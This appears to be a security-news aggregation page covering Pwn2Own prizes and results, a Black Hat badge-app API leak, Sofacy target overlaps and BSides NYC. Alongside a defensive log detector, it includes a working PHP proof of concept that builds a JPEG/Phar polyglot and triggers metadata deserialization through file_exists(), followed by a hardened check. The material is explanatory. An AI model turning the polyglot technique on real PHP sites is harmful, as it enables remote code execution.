- Congress -

Last update 10.09.2017 14:33:08




IoT Category Added to Pwn2Own Hacking Contest
5.9.2018 securityweek  Congress

This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.

The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.

Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.

In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.

In the web browsers category, security experts can receive a cash prize of $25,000 for hacking the default browser on Huawei P20, Xiaomi Mi6, and Samsung Galaxy S9, and $50,000 for a successful exploit against the browsers running on Apple’s iPhone X, and Google’s Pixel 2.

In the short distance category, which covers Wi-Fi, Bluetooth and near field communication (NFC), ZDI is offering up to $30,000 for exploits against the other phones and up to $60,000 for exploits targeting devices from Apple and Google.

Hacking a device simply by sending it an SMS/MMS message, or by getting its owner to view a message, can earn Pwn2Own Tokyo contestants as much as $75,000.

The highest rewards are offered this year for baseband attacks, which involve the target device communicating with a rogue base station. Researchers can get up to $50,000 for a successful exploit against Huawei, Xiaomi and Samsung devices, and up to $150,000 for hacking Apple and Google phones.

Pwn2Own Tokyo prizes

In the browser and short-range categories, participants can earn an extra $20,000 if their exploit payload is executed with kernel privileges. There is also a persistence bonus for these categories: $50,000 if the exploit survives a reboot on an iPhone X, and $25,000 if it survives a reboot on a Pixel 2.

Registration for Pwn2Own Tokyo closes on November 7 at 5:00 p.m. Japan Standard Time.

At last year’s event, hackers earned more than half a million dollars after successfully demonstrating exploits against the Samsung Galaxy S8, the Apple iPhone 7 and the Huawei Mate 9 Pro. No attempts were made against the Google Pixel.


Badge Reading App Exposed Details of Black Hat Conference Attendees
21.8.2018 securityweek Congress

A researcher discovered that a vulnerability in the badge reading app used at the recent Black Hat security conference exposed the registration details of all attendees.

The badges provided to people attending Black Hat and other conferences contain an NFC tag. When vendors scan the tag, they obtain the information provided during the registration process by the individual wearing the badge.

At Black Hat the tag was scanned using BCARD, a trade-show and conference badge reading application developed by ITN International. The app is designed to work on tablets and phones running Android or iOS.

Vulnerability in BCARD conference badge scanning app

A researcher who uses the online moniker “NinjaStyle” analyzed the BCARD application and discovered an API that could be used to obtain an attendee’s data without authentication based on the unique badgeID value assigned to each user.

NinjaStyle then conducted some tests to determine if a brute-force attack could be used to obtain information on all Black Hat attendees.

“After trying a few hundred requests on both 0-100000 and 000000-100000 and receiving no valid badges, I determined that those were likely not going to be valid ID ranges. We could then assume that valid IDs are 100000-999999. This leaves us with 900,000 total requests. With an estimated 18,000 BlackHat attendees, we can then assume that we will enumerate a valid badgeID in approximately 2% of our requests,” the researcher wrote in a blog post published on Monday.

He determined that a brute-force attack on the API would allow an attacker to obtain the names, email addresses, company names, phone numbers and addresses of all Black Hat attendees in roughly six hours.
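The enumeration described above, seen from the server side, as an added example that is not ITN's code or the researcher's script: a detector run over constructed access-log lines that flags clients sweeping the badgeID space. The endpoint path /api/badge/<id>, the log format, the client addresses and the thresholds are all assumptions made for the demonstration.

```php
<?php
// Added example, not ITN's code nor the researcher's script: a detector for
// the badgeID enumeration pattern described in the article, run over
// constructed access-log lines. Endpoint path, log format and thresholds
// are assumptions.

// Parse one line of the assumed form:
//   <client-ip> <timestamp> "GET /api/badge/<badgeID> HTTP/1.1" <status>
function parseLine(string $line): ?array
{
    if (!preg_match('#^(\S+) (\S+) "GET /api/badge/(\d+)[^"]*" (\d{3})$#', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'id' => (int) $m[3], 'status' => (int) $m[4]];
}

// Flag clients that look up many distinct badge IDs, are mostly told "not
// found", and walk the ID space in order. A vendor scanning badges that are
// physically in front of them produces scattered IDs and (almost) only hits.
function findEnumerators(array $lines, int $minDistinct = 50, float $minMissRatio = 0.5): array
{
    $perClient = [];
    foreach ($lines as $line) {
        $r = parseLine($line);
        if ($r === null) {
            continue;
        }
        $ip = $r['ip'];
        $perClient[$ip]['ids'][$r['id']] = true;
        $perClient[$ip]['total'] = ($perClient[$ip]['total'] ?? 0) + 1;
        if ($r['status'] === 404) {
            $perClient[$ip]['misses'] = ($perClient[$ip]['misses'] ?? 0) + 1;
        }
    }

    $flagged = [];
    foreach ($perClient as $ip => $c) {
        $ids = array_keys($c['ids']);
        sort($ids);
        $distinct  = count($ids);
        $missRatio = ($c['misses'] ?? 0) / $c['total'];
        // share of consecutive distinct IDs that differ by exactly one
        $steps = 0;
        for ($i = 1; $i < $distinct; $i++) {
            if ($ids[$i] - $ids[$i - 1] === 1) {
                $steps++;
            }
        }
        $sequential = $distinct > 1 ? $steps / ($distinct - 1) : 0.0;
        if ($distinct >= $minDistinct && $missRatio >= $minMissRatio) {
            $flagged[$ip] = [
                'distinct'   => $distinct,
                'miss_ratio' => round($missRatio, 2),
                'sequential' => round($sequential, 2),
            ];
        }
    }
    return $flagged;
}

// Constructed sample: one client sweeping 100000..100199 with roughly 2% valid
// IDs (the hit rate estimated in the post), one vendor scanning five real badges.
$lines = [];
for ($id = 100000; $id < 100200; $id++) {
    $n = $id - 100000;
    $lines[] = sprintf('203.0.113.7 2018-08-08T10:%02d:%02dZ "GET /api/badge/%d HTTP/1.1" %d',
        intdiv($n, 60), $n % 60, $id, ($id % 50 === 0) ? 200 : 404);
}
foreach ([348201, 512877, 120045, 987210, 455019] as $id) {
    $lines[] = sprintf('198.51.100.22 2018-08-08T11:00:00Z "GET /api/badge/%d HTTP/1.1" 200', $id);
}

print_r(findEnumerators($lines));
```

Only the sweeping client should be reported; the vendor with five scattered hits stays under the distinct-ID threshold. A detector like this only catches a sweep in progress. The actual fix is to require authentication on the lookup and to stop keying it on a guessable six-digit number; ITN's response, as described below, was to disable the API altogether.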

The researcher reported his findings to ITN on August 9 and while he initially encountered some difficulties in establishing contact with the company, the issue was patched by August 13. ITN said it had addressed the vulnerability by disabling the problematic API, which it claimed had been a legacy system.

This is not the first time experts have found vulnerabilities in one of the apps used at the Black Hat conference. Back in 2016, the event’s organizers were forced to update the official application after researchers discovered several flaws that could have been exploited to impersonate users and spy on them.

Also in 2016, researchers found that the badge scanning application provided by RSA Conference organizers to vendors had been affected by a security bypass flaw caused by a default password left in the code.


Black Hat 2018 – Expert demonstrated a new PHP code execution attack
17.8.2018 securityaffairs Congress

Security researcher Sam Thomas of Secarma has discovered a new attack technique that leverages critical deserialization behaviour in the PHP programming language.
The flaw potentially exposes web applications written in the popular language to attack, including websites running CMSs such as WordPress and Typo3.

The expert found that an attacker can use low-risk file functions against Phar archives to trigger a deserialization attack without the application ever calling unserialize(). Phar archives are similar to Java JAR archives but are specific to PHP: a Phar application or library can be distributed as a single file.

Phar files carry metadata in PHP's serialized format. That metadata is unserialized whenever a file-operation function (fopen, file_exists, file_get_contents, etc.) touches the archive, with no unserialize() call in the application's own code.

“Typically, these archives are used to hold self-extracting or self-contained applications, in the same way that a Jar archive can be executed a Phar archive contains an executable stub containing PHP code. To get to the crux of the issue at hand, Phar archives can also contain meta-data, and: ‘Meta-data can be any PHP variable that can be serialized.’” wrote Thomas.

“This meta-data is unserialized when a Phar archive is first accessed by any(!) file operation. This opens the door to unserialization attacks whenever a file operation occurs on a path whose beginning is controlled by an attacker. This is true for both direct file operations (such as “file_exists”) and indirect operations such as those that occur during external entity processing within XML (i.e. when an XXE vulnerability is being exploited).”

Thomas demonstrated at the Black Hat hacking conference how to trigger the flaws to hack WordPress sites using an author account and take full control over the underlying web server.

An attacker could trigger the flaw by uploading a specially crafted Phar archive containing a malicious payload onto the target's local file system and then getting the application to access it through the “phar://” stream wrapper.
Thomas explained that the archive can be disguised as a JPEG image by modifying its first 100 bytes, so that it passes the upload checks applied to image files.

“The way certain thumbnail functionality within the application works enables an attacker with the privileges to upload and modify media items to gain sufficient control of the parameter used in a “file_exists” call to cause unserialization to occur.” explained the researcher.

“The core vulnerability is within the wp_get_attachment_thumb_file function in /wpincludes/post.php:”


Once the malicious thumbnail has been uploaded to the targeted WordPress server, the attacker can reach a function that opens the image file as a Phar archive through the “phar://” stream wrapper.

“It is possible to reach this function through an XMLRPC call to the “wp.getMediaItem” method, with an arbitrary value for $imagedata['thumb'] and a partially controlled value for $file. $file is returned by get_attached_file also from /wp-includes/post.php” continues the analysis.

A remote authenticated attacker who is able to create or edit posts can therefore upload a malicious image and execute arbitrary PHP code on the target system.
Thomas reported his findings to the WordPress security team on 28 February 2017. WordPress released a security update, but it did not solve the problem completely.

The researcher also reported the flaw to Typo3 on 9th June 2018, and the issue was fixed with the release of the versions 7.6.30, 8.7.17 and 9.3.
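The technique described above, as an added example that is not code from the article, from Secarma or from WordPress: it builds the JPEG/Phar polyglot, shows a plain file_exists() on a phar:// path unserializing the archive's metadata, and pairs the vulnerable call with a wrapper-prefix check that stops it. The class name Evil, the file names and the check itself are assumptions; the script needs PHP 7.x and must be started with phar.readonly disabled so it can create the archive.

```php
<?php
// Added example, not code from the article, from Secarma or from WordPress:
// a minimal reproduction of the Phar metadata deserialization described
// above, next to one server-side check that blocks it. Class and file names
// are made up. Run with:  php -d phar.readonly=0 phar_demo.php   (PHP 7.x)

class Evil
{
    public $cmd = 'id';

    // A real gadget chain would reach something dangerous from a magic method
    // such as __wakeup() or __destruct(); this one only proves that the
    // metadata was unserialized into a live object.
    public function __wakeup()
    {
        echo "[!] Evil::__wakeup ran, metadata was unserialized (cmd={$this->cmd})\n";
    }
}

// Build a Phar whose stub begins with a JPEG header, so it passes naive image
// checks, and whose metadata is a serialized Evil object.
function buildPolyglot(string $target): void
{
    $tmp = dirname($target) . '/build.phar';   // a Phar can only be *created* under a .phar name
    @unlink($tmp);
    $phar = new Phar($tmp);
    $phar->startBuffering();
    $phar->addFromString('test.txt', 'text');
    $jpegHeader = "\xFF\xD8\xFF\xE0\x00\x10JFIF\x00";
    $phar->setStub($jpegHeader . '<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata(new Evil());             // serialized into the manifest
    $phar->stopBuffering();
    rename($tmp, $target);                      // phar:// ignores the extension when reading
}

// Vulnerable pattern: the caller controls the start of the path, so a
// "phar://" prefix turns file_exists() into unserialize() on the metadata.
function vulnerableExists(string $path): bool
{
    return file_exists($path);
}

// Hardened pattern: refuse any stream-wrapper prefix before touching the path
// (or unregister the wrapper globally with stream_wrapper_unregister('phar')).
function hardenedExists(string $path): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false;
    }
    return file_exists($path);
}

$image = __DIR__ . '/evil.jpg';
buildPolyglot($image);
$attackerControlled = 'phar://' . $image . '/test.txt';

echo "vulnerable: ";
var_dump(vulnerableExists($attackerControlled));   // __wakeup message, then bool(true)
echo "hardened:   ";
var_dump(hardenedExists($attackerControlled));     // bool(false), archive never parsed
unlink($image);
```

On the vulnerable branch the __wakeup message appears before file_exists() even returns, which is the whole point: nothing in the application called unserialize(). The prefix check is deliberately a denylist of URL schemes rather than a search for "phar://" alone, since other wrappers are just as unwelcome in a path that should name a local file. Note that PHP 8.0 changed Phar to unserialize metadata only on an explicit getMetadata() call, so on PHP 8 the vulnerable branch no longer fires the gadget; the check is still worth having on the 7.x branches the article was written against.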


Hackers awarded $267,000 at Pwn2Own 2018, far less than in past editions
18.3.2018 securityaffairs Congress

At Pwn2Own 2018 the hackers received a total of $267,000, far less than in past editions, but the quality of the research was remarkable.
The popular Pwn2Own hacking competition has concluded; let's see how much the hackers earned and which applications they successfully pwned.

White hat hackers have earned a total of $267,000 at Pwn2Own 2018 competition for exploits targeting Microsoft Edge, Apple Safari, Oracle VirtualBox and Mozilla Firefox.

This year the popular competition, organized by Trend Micro's Zero Day Initiative, was run in partnership with Microsoft and sponsored by VMware.

The overall prize pool announced by ZDI was $2 million, but only $267,000 was actually awarded to the hackers.

The amount was lower than in past years: white hat hackers earned $833,000 in 2017, $460,000 in 2016 and $552,500 in 2015.

“Overall, we awarded $267,000 over the two-day contest while acquiring five Apple bugs, four Microsoft bugs, two Oracle bugs, and one Mozilla bug.” states the organization.

“While smaller than some of our previous competitions, the quality of research was still extraordinary and highlights the difficulty in producing fully-functioning exploit for modern browsers and systems.”

On the first day, hackers earned a total of $162,000 USD and 16 points towards Master of Pwn. The white hat hacker Richard Zhu, aka fluorescence, failed to hack Safari, but he successfully used an exploit chain against Edge earning $70,000.

Niklas Baumstark from the Phoenhex team was awarded $27,000 for hacking VirtualBox, and Samuel Groß, aka saelo, also of Phoenhex, received $65,000 for hacking Safari.

“The first day of Pwn2Own 2018 has come to a close, and so far, we’ve awarded $162,000 USD and 16 points towards Master of Pwn. Today saw 2 successful attempts, 1 partial success, and 1 failure. In total, we purchased 3 Apple bugs, 2 Oracle bugs, and 3 Microsoft bugs.” states the official site of the competition.

PWN2OWN 2018

On the second day, the hackers earned a total of $105,000 USD and 11 more Master of Pwn points were awarded.

Richard Zhu earned $50,000 for hacking Firefox with a Windows kernel EoP. He chained an out-of-bounds (OOB) write in the browser followed by an integer overflow in the Windows kernel.

Zhu was the star of Pwn2Own 2018: he won this year's Master of Pwn award, receiving a total of $120,000 and 65,000 ZDI reward points worth roughly $25,000.

“The day started with the return of Richard Zhu (fluorescence), this time targeting Mozilla Firefox with a Windows kernel EoP. He eschewed all drama today and successfully popped Mozilla Firefox on his first attempt.” states the post published on Day 2 of the Pwn2Own 2018.

“He used an out-of-bounds (OOB) write in the browser followed by an integer overflow in the Windows kernel to earn himself another $50,000 and 5 more Master of Pwn points. This brings his event total to $120,000 and a commanding lead for Master of Pwn.”

On the same day, white hat hackers Markus Gaasedelen (gaasedelen), Nick Burnett (itszn13), and Patrick Biernat of Ret2 Systems, Inc. targeted Apple Safari with a macOS kernel EoP.

They demonstrated their exploit successfully only on the fourth attempt, but Pwn2Own rules allow a maximum of three attempts.

They received no prize, but the Zero Day Initiative (ZDI) did purchase the vulnerabilities and disclosed them to Apple.

The last entry of the day came from MWR Labs: Alex Plaskett (AlexJPlaskett), Georgi Geshev (munmap), and Fabi Beterke (pwnfl4k3s) earned $55,000 for a Safari sandbox escape that used a heap buffer underflow in the browser and an uninitialized stack variable in macOS.


Hackers Awarded $267,000 at Pwn2Own 2018
16.3.2018 securityweek Congress

White hat hackers have earned a total of $267,000 at this year’s Pwn2Own competition for exploits targeting Microsoft Edge, Apple Safari, Oracle VirtualBox and Mozilla Firefox.

On the first day, Richard Zhu (aka fluorescence) failed to hack Safari, but he did demonstrate an exploit chain against Edge, which earned him $70,000. Niklas Baumstark from the Phoenhex team received $27,000 for hacking VirtualBox, while Samuel Groß (aka saelo) of Phoenhex earned $65,000 for hacking Safari.

Richard Zhu wins Pwn2Own 2018

On the second day of Pwn2Own 2018, Zhu earned $50,000 for hacking Firefox with an out-of-bounds write flaw in the browser and an integer overflow in the Windows kernel. Zhu went on to win this year's Master of Pwn award, taking home a total of $120,000 and 65,000 ZDI reward points worth roughly $25,000.

Employees of Ret2 Systems demonstrated an exploit chain targeting Safari, but they were successful only on the fourth attempt. Since Pwn2Own rules state that the exploit must be demonstrated in a maximum of three attempts, they did not win any money as part of the contest, but the Zero Day Initiative (ZDI) did purchase the vulnerabilities and disclosed them to Apple via its regular process.

Finally, a team from MWR Labs earned $55,000 for a Safari sandbox escape. They used a heap buffer overflow in Safari and an uninitialized stack variable in macOS to execute arbitrary code.

Pwn2Own 2018 was backed by Microsoft and VMware, and ZDI announced a prize pool of $2 million. The total of $267,000 awarded at the event was far less than in the past years when researchers earned $833,000 (2017), $460,000 (2016) and $552,500 (2015).

ZDI noted that some of the experts who had registered for the event were forced to withdraw due to various reasons, including the fact that Microsoft’s latest updates patched the vulnerabilities they had planned on using.

“While smaller than some of our previous competitions, the quality of research was still extraordinary and highlights the difficulty in producing fully-functioning exploit for modern browsers and systems,” ZDI said.

The highest prizes at Pwn2Own 2018 were offered by Microsoft, including for the Hyper-V client ($150,000), Outlook ($100,000), and Windows SMB ($100,000). The company also offered a total of more than $800,000 for exploits targeting Windows Defender Application Guard for Edge, Windows SMB, and the Hyper-V client running on the latest Windows Insider Preview for Business on a Surface Book 2 device.


Edge, VirtualBox, Safari Hacked at Pwn2Own 2018
15.3.2018 securityweek Congress

White hats managed to hack Microsoft Edge, Apple Safari and Oracle VirtualBox on the first day of the Pwn2Own 2018 competition, taking place alongside the CanSecWest conference in Vancouver, Canada.

There were only four entries on the first day of Pwn2Own 2018. First, Richard Zhu (aka fluorescence) attempted to perform a sandbox escape on Apple’s Safari web browser, but failed to do it in the 30-minute time slot. He did, however, manage to hack Microsoft Edge using two use-after-free bugs in the browser and an integer overflow in the Windows kernel. This attempt, which involved reworking his exploit on the spot, earned him $70,000.

Niklas Baumstark from the Phoenhex team had a partially successful entry against Oracle VirtualBox. While he did manage to execute code using out-of-bounds read and time of check to time of use (TOCTOU) bugs, he was awarded only $27,000 of the maximum of $35,000.

Finally, Samuel Groß (aka saelo) of the Phoenhex team earned $65,000 for executing code in Safari using a JIT optimization bug in the web browser, a logic flaw in macOS, and a kernel overwrite vulnerability.

Only three attempts are scheduled for the second day of the event, including two that target Safari and one that targets Mozilla Firefox. Contestants earned a total of $162,000 on the first day, and they will probably not earn much more on the second day, unless their exploits include a virtual machine escape via a kernel privilege escalation vulnerability, for which there is a bonus of $50,000-$70,000.

In comparison, last year's event had roughly 30 entries and spanned three days. Contestants earned more than $800,000 for a record-breaking 51 vulnerabilities.

The Zero Day Initiative (ZDI), which organizes Pwn2Own, said the number of white hat hackers that registered was initially higher, but some of them were forced to withdraw from the competition for various reasons, including due to their vulnerabilities being patched by Microsoft with the latest security updates.

ZDI announced in January a prize pool of $2 million for Pwn2Own 2018, which is backed by Microsoft and VMware.

While the Edge browser was hacked on the first try, Microsoft seems happy that contestants could not escape its Windows Defender Application Guard (WDAG) isolation protection. Escaping the WDAG container could have earned researchers between $10,000 and $250,000 at Pwn2Own.


Sofacy Attacks Overlap With Other State-Sponsored Operations
12.3.2018 securityweek Congress

Kurt Baumgartner details latest Sofacy attacks at Kaspersky SAS

CANCUN - KASPERSKY SECURITY ANALYST SUMMIT - Attacks carried out by a Russian threat group appear to overlap with campaigns conducted by other cyberspies, including ones linked by researchers to China and the United States.

Kaspersky Lab revealed last month that the Russian threat actor known as Sofacy, APT28, Fancy Bear, Pawn Storm, Sednit and Strontium had shifted its focus from NATO member countries and Ukraine to Central Asia and further east, including China.

On Friday, at Kaspersky’s Security Analyst Summit (SAS), researcher Kurt Baumgartner revealed that the group appears to be particularly interested in military, defense and diplomatic entities in the far east.

Baumgartner also revealed that the attacks launched by Sofacy sometimes overlap with the operations of other state-sponsored cyberspies in terms of victims.

For instance, researchers discovered Sofacy's Zebrocy malware on machines that had also been compromised by Mosquito, a backdoor associated with Turla, a different threat actor linked to Russia. Shared victims include diplomatic and commercial organizations in Europe and Asia.

Sofacy’s SPLM malware (aka CHOPSTICK and X-Agent) was found on devices that had also been infected with other Turla malware, which often precedes SPLM.

SPLM has also been spotted on the same systems as malware known to have been used by a China-linked actor known as Danti.

According to Kaspersky, overlaps were generally found on systems belonging to government, technology, science, and military organizations in Central Asia.

Another interesting overlap was between Sofacy and the English-speaking Lamberts group, which is also known as Longhorn. Security firms revealed last year that this cyber espionage group had been using some of the Vault 7 tools leaked by WikiLeaks. These tools are believed to have been developed and used by the U.S. Central Intelligence Agency (CIA).

Kaspersky said it had identified Sofacy backdoors and malware associated with the Lamberts, specifically Grey Lambert, on a server belonging to a military and aerospace conglomerate in China.

Researchers admit, however, that the presence of both Lamberts and Sofacy malware on the server could simply mean that the former planted a false flag, considering that the original delivery vector for the Sofacy tool remains unknown. It’s also possible that the Russian group exploited a previously unknown vulnerability, or that it somehow harnessed the Grey Lambert malware to download its own tools. The most likely scenario, according to experts, is that the Sofacy malware was delivered using an unknown PowerShell script or a legitimate app in which the attackers discovered a flaw.

“Sofacy is sometimes portrayed as wild and reckless, but as seen under our visibility, the group can be pragmatic, measured and agile. Their activity in the East has been largely under-reported, but they are clearly not the only threat actor interested in this region, or even in the same targets,” Baumgartner said. “As the threat landscape grows ever more crowded and complex, we may encounter more examples of target overlap and it could explain why many threat actors check victim systems for the presence of other intruders before fully launching their attacks.”

Kaspersky recently spotted the SPLM malware being used in an attack aimed at a major air defense organization in China, while the Zebrocy tool has been used in high-volume campaigns targeting entities in Armenia, Turkey, Tajikistan, Kazakhstan, Afghanistan, Mongolia, Japan and China.


BSides NYC, a volunteer organized event put on by and for the community
7.2.2018 Kaspersky  Congress
Another edition of BSides NYC has passed, and as a first-time attendee and presenter, I was genuinely impressed with the impeccable organization, the content shared, and the interesting conversations that took place among enthusiasts and professionals from all over the world. I've been a long-time follower and supporter of BSides events in Latin America, mainly due to the fact that they offer a relaxed venue for sharing and learning about the newest topics in information security, all while bringing together people from different backgrounds in a community-driven event.

This year's edition of BSides NYC took place at the John Jay College of Criminal Justice, with a faculty member and the deputy CISO of the City of New York opening the event, along with some additional memorable keynotes given by Runa Sandvik from the New York Times and Amber Baldet from JP Morgan. Once the initial kick-off was done, each attendee was able to choose from two technical tracks, an entrepreneur track, or any of the available villages and workshops. It was certainly tough for everyone to decide where to spend their time, taking a coffee break here and there to meet and greet colleagues and friends, and to keep enjoying all the activities happening around.

After lunch, I began my presentation on “Threat hunting .NET malware with YARA”, giving some examples of how to use YARA and the newly added .NET module, particularly useful for tracking the growing number of malware relying on Microsoft's flagship framework. For learning purposes I chose a very popular malware targeting Latin American ATMs named Ploutus, which has landed in US territory just recently. It was quite an experience to fit an entire day of YARA content in less than an hour, but fortunately everyone at the presentation was extremely supportive, whether they had been using the tool since the beginning or had never heard of it before.

From https://twitter.com/mathmare_/status/954786901621387264

Then it was the turn of Dmitry Bestuzhev, Director of Kaspersky Lab's Global Research and Analysis Team in Latin America, who gave an astonishing presentation titled “Moving like a Spook through Walls Or how to be only a shadow for APT detectors”. It's always interesting to observe how the community sees the Latin American threat landscape, which sometimes seems not to get the attention it deserves. There wasn't enough room in the auditorium to fit all the people interested in the talk; however, since coffee and pastries were waiting for us after the presentation, the conversation could be continued with all of those who were eager to keep the debate open.

From https://twitter.com/pentest_it/status/954789778528096256

The biggest surprise for me was the addition of an entrepreneur track, something that undoubtedly every attendee was thankful for. Sometimes we are guilty of getting lost in the technical side of things, forgetting about the business and how to actually make our idea reach the audience we want it to. There were presentations from different startups, and remarkable information on how to grow your business, monetize it, and ultimately how not to lose sight of your original concept or idea even when dealing with venture capital and external pressures.

It’s one of those events that you can’t miss, whether it’s playing the custom capture the flag game with your team, building weird antennas in the hacking village, or participating in any of the tracks, you’ll find something in BSides NYC for you. Oh, and don’t forget, there’s always conference swag!


New Targets, $2 Million in Prizes Announced for Pwn2Own 2018
25.1.2018 securityweek Congress

Trend Micro’s Zero Day Initiative (ZDI) announced on Thursday that this year’s Pwn2Own hacking competition offers $2 million in cash and prizes, with several new pieces of software added to the list of targets.

Pwn2Own 2018 is scheduled to take place on March 14-16 alongside the CanSecWest conference in Vancouver, Canada. This year, ZDI has partnered with Microsoft for the event, and VMware has been announced as a sponsor.

This year’s categories are virtualization, web browsers, enterprise applications, servers, and the Windows Insider Preview challenge.

In the virtualization category, Pwn2Own 2018 introduces a new target, namely Oracle VirtualBox. Researchers can earn $35,000 and a $30,000 bonus if they can execute a privilege escalation via a Windows kernel vulnerability on the host. The base prize for VMware Workstation is $70,000 and for Microsoft Hyper-V it’s $150,000.

All major web browsers are targeted at Pwn2Own 2018. A sandbox escape can earn contestants $60,000 if it works on Chrome or Edge, $55,000 on Safari, and $40,000 on Firefox. Hackers can earn a bonus of $50,000-$70,000 if they combine their exploit with a virtual machine escape via a kernel privilege escalation vulnerability.

The targeted apps in the enterprise category are Adobe Reader, with a maximum prize of $90,000, Office 365 ProPlus, with a maximum prize of $50,000, and Microsoft Outlook, for which organizers are prepared to pay out up to $100,000. This will be the first time Outlook is a target at Pwn2Own.

In the servers category, there are no fewer than three new targets: NGINX, Microsoft Windows SMB, and OpenSSL. Apache Web Server, the only target in this category at last year's event, remains on the list. Vulnerabilities in each of these pieces of software can earn researchers up to $100,000.

Since Microsoft is a partner of Pwn2Own 2018, it has asked ZDI to introduce a special category for some of its flagship pre-release security technologies in the latest Windows Insider Preview for Business running on Surface Book 2 devices.

Targets include Windows Defender Application Guard for Edge, Windows SMB, and the Windows Hyper-V client. Prizes range between $10,000 and $250,000.

As always, the contestant or team with the highest number of Master of Pwn points will earn 65,000 ZDI reward points, which are worth roughly $25,000. In addition, the first-round winner for each category can win a laptop.

At Pwn2Own 2017, ZDI paid out a total of $833,000 for 51 vulnerabilities, nearly double the $460,000 earned by hackers the previous year for only 21 new flaws. Given that this year's prize pool is $2 million, double what organizers offered last year, we can expect some interesting exploits.


Smartphone Exploits Earn Hackers Over $500,000
2.11.2017 securityweek  Congress
White hat hackers earned more than half a million dollars at this year’s Mobile Pwn2Own competition after successfully demonstrating exploits against Samsung’s Galaxy S8, Apple’s iPhone 7 and Huawei’s Mate 9 Pro.

The hacking contest, organized by Trend Micro’s Zero Day Initiative (ZDI) at the PacSec conference in Tokyo, Japan, offered more than $500,000 for exploit chains targeting browsers, short distance communications (Wi-Fi, Bluetooth and NFC), messaging, and baseband components in the Google Pixel, Galaxy S8, iPhone 7 and Mate 9 Pro.

All devices had been running the latest versions of the software and operating systems – Apple, Google and Huawei released patches the night before the event started.

On the first day, participants earned a total of $350,000 for disclosing vulnerabilities that allow attacks against Internet Browser on the Galaxy S8, Safari on the iPhone 7, Wi-Fi on the iPhone 7, and the baseband on the Mate 9 Pro.

On the second day, MWR Labs earned $25,000 for hacking Google Chrome on the Mate 9 Pro via five logic bugs in Huawei apps that allowed a browser sandbox escape and data exfiltration.

The same team took home an additional $25,000 after exploiting 11 flaws across six different apps to hack Internet Browser on the Galaxy S8. The exploit resulted in arbitrary code execution and sensitive data leakage.

A researcher from China-based Qihoo 360 earned $20,000 for a partially successful exploit targeting the iPhone 7’s Wi-Fi component. The exploit worked properly, but one of the three vulnerabilities it leveraged had been previously disclosed at Pwn2Own by a different contestant. The same Chinese expert was awarded another $25,000 for hacking Safari on the iPhone 7.

The last entry came from the researcher Amat Cama (aka Acez), who earned $50,000 for a baseband exploit targeting the Galaxy S8. The exploit relied on a stack-based buffer overflow that allowed arbitrary code execution.

The total amount of money paid to researchers over the course of two days at Mobile Pwn2Own 2017 was $495,000. The Tencent Keen Security Lab team got the highest number of Master of Pwn points, which also earned them 65,000 ZDI reward points, worth roughly $25,000.

Mobile Pwn2Own 2017 results


While one successful entry did target the Chrome browser, no one attempted to demonstrate an exploit on Google's Pixel phone.

Affected vendors have been provided the details of the vulnerabilities used at the event and ZDI will give them 90 days to release fixes before a limited advisory describing the flaws will be made public.


White hat hackers earn over $500,000 for mobile exploits at Mobile Pwn2Own 2017 competition
2.11.2017 securityaffairs Congress

Let's see what happened at the Mobile Pwn2Own 2017 competition organized by Trend Micro's Zero Day Initiative (ZDI) at the PacSec conference in Tokyo.

White hat hackers earned more than half a million dollars at the Mobile Pwn2Own 2017 competition by successfully devising exploits against popular smartphones running the latest versions of their operating systems.

Major vendors, including Apple, Google and Huawei released patches the night before the event started.

The exploits target browsers, short distance communications (Wi-Fi, Bluetooth, and NFC), messaging, and baseband components in the mobile devices, including Samsung’s Galaxy S8, Apple’s iPhone 7 and Huawei’s Mate 9 Pro.


Participants earned a total of $350,000 for triggering vulnerabilities in Internet Browser on the Galaxy S8, Safari on the iPhone 7, Wi-Fi on the iPhone 7, and the baseband on the Mate 9 Pro.

“The first day of Mobile Pwn2Own 2017 has come to a close, and we’ve awarded a total of $350,000 and 55 Master of Pwn points. Today saw five successful attempts and two failed attempts as the ZDI program acquired 11 bugs for the Samsung Galaxy S8, Apple iPhone 7, and the Huawei Mate9 Pro.” states ZDI blog post.

There were also failures: for example, Tencent Keen Security Lab (@keen_lab), targeting the Samsung Internet Browser on the Samsung Galaxy S8, could not get their exploit chain to work within the allotted time.

Fortunately, the same team demonstrated a successful WiFi exploit on the Apple iPhone 7.

“They used a total of four bugs to gain code execution and escalate privileges to allow their rogue application to persist through a reboot. They earned $60,000 for the WiFi exploit and added $50,000 for the persistence bonus – a total of $110,000 and 11 Master of Pwn points. This screenshot may not look like much, but all it took was connecting to a WiFi network to get the “KeenLab” app to appear.” continues ZDI.

Day Two
On the second day, experts from MWR Labs earned $25,000 for hacking Google Chrome on the Mate 9 Pro via five logic flaws in Huawei apps that allowed them to escape the browser sandbox and exfiltrate data.

MWR Labs hackers also earned $25,000 after exploiting 11 vulnerabilities across six different apps to hack the Internet Browser on the Galaxy S8. They chained the flaws to remotely execute arbitrary code and leak sensitive data.

A researcher from China-based Qihoo 360 (@mj0011sec) earned $20,000 for a partially successful exploit targeting the iPhone 7’s Wi-Fi component; later he was awarded another $25,000 for hacking Safari on the iPhone 7.

The total amount of money paid to participants at Mobile Pwn2Own 2017 was $495,000. The Tencent Keen Security Lab team obtained the highest number of Master of Pwn points.

What’s next?

The ZDI has already reported the details of the vulnerabilities exploited during the contest to the affected vendors. Vendors have 90 days to release fixes before a limited advisory describing the flaws is made public.


Smartphone Exploits Earn Hackers Over $500,000
2.11.2017 securityaffairs  Congress
White hat hackers earned more than half a million dollars at this year’s Mobile Pwn2Own competition after successfully demonstrating exploits against Samsung’s Galaxy S8, Apple’s iPhone 7 and Huawei’s Mate 9 Pro.

